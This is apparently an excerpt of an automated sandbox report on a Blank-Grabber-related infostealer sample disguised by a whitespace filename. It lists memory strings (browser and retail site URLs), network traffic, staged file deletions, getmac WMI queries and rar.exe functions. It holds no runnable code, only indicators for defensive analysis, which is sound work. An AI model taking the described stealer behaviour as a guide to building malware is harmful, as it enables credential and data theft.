Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png0
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123517500.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2142394974.0000028C877C9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2142899018.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2136068563.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154822441.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2321848291.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2083926352.0000028C87C97000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2162960886.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefox
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2111304815.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123517500.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2143671721.0000028C87C2A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327717608.0000028C87630000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327784022.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2325587092.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163201271.0000028C877C9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327337197.0000028C8737A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2322889946.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154159134.0000028C877C5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2130602364.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2323195620.0000028C877D3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2142394974.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324867751.0000028C877D6000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328156314.0000028C877D9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2082475372.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163456438.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2139193812.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330698605.0000028C88140000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330540975.0000028C87F90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88248000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.ca/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.co.uk/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.de/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.fr/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.bbc.co.uk/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.co.uk/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.de/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88220000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2135317494.0000028C8873B000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123650876.0000028C8873A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2103806631.0000028C8873B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.oL
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123517500.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2142394974.0000028C877C9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2152989212.0000028C8874D000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88284000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2142899018.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330540975.0000028C8800C000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88270000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2136068563.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2111304815.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2083926352.0000028C87C97000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2111304815.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123517500.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2143671721.0000028C87C2A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87B74000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2083926352.0000028C87C97000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2093617683.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2083926352.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2111304815.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123517500.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2143671721.0000028C87C2A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2083926352.0000028C87C97000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2135142986.0000028C8878F000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2151303620.0000028C8878F000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2139599127.0000028C8878F000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2103806631.0000028C8873B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2111304815.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123517500.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2083926352.0000028C87C97000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2143671721.0000028C87C2A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2135317494.0000028C8873B000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123650876.0000028C8873A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2103806631.0000028C8873B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/mediZ
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2135317494.0000028C8873B000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123650876.0000028C8873A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2103806631.0000028C8873B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/favi
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2092773459.0000028C8873A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/favicons/m
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2092773459.0000028C8873A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2083926352.0000028C87C74000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2142899018.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2325587092.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2136068563.0000028C87C73000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/favicons/mozilla/favicon.d25d81d39065.icox
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2111304815.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123517500.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2143671721.0000028C87C2A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2111304815.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123517500.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2143671721.0000028C87C2A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88278000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2332092681.0000028C88A42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88248000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2340140316.00007FF8A9398000.00000004.00000001.01000000.00000011.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2336517828.00007FF8A86A9000.00000004.00000001.01000000.00000010.sdmp String found in binary or memory: https://www.openssl.org/H
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327145319.0000028C871D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2337720885.00007FF8A8D69000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: https://www.python.org/psf/license/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2337720885.00007FF8A8C63000.00000040.00000001.01000000.00000005.sdmp String found in binary or memory: https://www.python.org/psf/license/)
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88248000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328156314.0000028C877E5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163201271.0000028C877C9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2322889946.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154159134.0000028C877C5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2130602364.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2323195620.0000028C877D3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2142394974.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324867751.0000028C877E1000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2326282443.0000028C877E4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324867751.0000028C877D6000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328156314.0000028C877D9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2082475372.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163456438.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2139193812.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://yahoo.com/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57967
Source: unknown Network traffic detected: HTTP traffic on port 57967 -> 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File deleted: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\PALRGUCVEH.docx Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File deleted: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\PALRGUCVEH.docx Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File deleted: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\EIVQSAOTAQ.pdf Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File deleted: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\GIGIYTFFYT.jpg Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe File deleted: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\PALRGUCVEH.xlsx Jump to behavior
Source: cmd.exe Process created: 53

System Summary

barindex
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 3615
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: Commandline size = 3647 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 3615
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7E9D2C0: CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW, 68_2_00007FF7F7E9D2C0
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7ECB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx, 68_2_00007FF7F7ECB57C
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE36370 0_2_00007FF73AE36370
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE17950 0_2_00007FF73AE17950
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE372BC 0_2_00007FF73AE372BC
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE30F38 0_2_00007FF73AE30F38
